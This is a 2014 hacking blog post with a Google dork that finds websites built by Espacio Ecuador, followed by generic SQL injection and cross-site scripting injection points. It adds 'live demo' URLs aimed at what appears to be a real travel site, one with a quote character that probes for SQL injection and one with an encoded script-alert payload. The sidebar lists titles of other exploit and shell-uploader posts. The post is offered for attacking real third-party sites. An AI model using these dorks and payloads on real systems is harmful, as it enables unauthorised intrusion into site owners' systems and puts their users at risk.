Welcome To My Blog!!

Saturday, July 19, 2014

Espacio Ecuador XSS & SQLI



Dork:

intext:"developed by Espacio Ecuador"


Exploits:

http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>


Live Demo:

SQLI:

http://www.galapagostraveline.com/deal.html?opc=31%27


XSS:

http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


at 9:03 PM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Total Pageviews

About Me

MKong4
View my complete profile

Blog Archive

  • ▼  2014 (75)
    • ▼  July (22)
      • 1-Footholds*Google search: intitle:"WSO 2.4" [ Sec...
      • Lan Hack With dSploit On Android
      • SQL 2014 DORK
      • Exploit Joomla!: JCE
      • Exploit WordPress: Optin Pro - File Upload Vulnera...
      • Espacio Ecuador XSS & SQLI
      • Pej Studio & Nissi Infotech & Plante Graffix - XSS
      • MyBB Kingchat - XSS
      • Pro-Service - XSS Vulnerability
      • Joomla Aclassif - XSS
      • Joomla Collector Shell Uploader
      • ProActive CMS - XSS
      • Noname - Media - XSS
      • Cách xử lí khi lỡ quên mật khẩu router
      • Sock 5 Vip!! (9/7/2014)
      • Sock 5 Vip!! (7/7/2014)
      • Sock 5 Vip!! (6/7/2014)
      • Sock 5 Vip!! (4/7/2014)
      • MachForm Remote Shell Upload
      • Namo WebEditor v5.0 Remote File Uploader
      • Sock 5 Vip!! (1/7/2014)
      • [ADD ONS] Hacker ToolKit For Google Chrome
    • ►  June (53)
Awesome Inc. theme. Theme images by RBFried. Powered by Blogger.